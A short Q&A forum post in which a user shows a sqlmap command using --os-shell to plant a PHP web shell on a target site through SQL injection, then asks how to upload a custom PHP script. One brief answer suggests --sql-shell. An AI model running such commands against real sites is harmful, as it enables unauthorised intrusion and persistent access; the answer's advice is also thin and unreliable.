# sqlmap os-shell help needed

Tags: shell, mysql

I run this command to upload php shell:

```
./sqlmap.py -u http://target.com/myfile.php?id=1 --os-shell
```

And it succeeded: The shell uploaded the file successfully and it's working.
But my question is how to upload a custom php script (in other words, a custom php file which is written by me) using `--os-shell`.

Answer (score 1):

I'm afraid you can't upload a PHP shell using the OS shell Option rather use  --sql-shell to upload the shell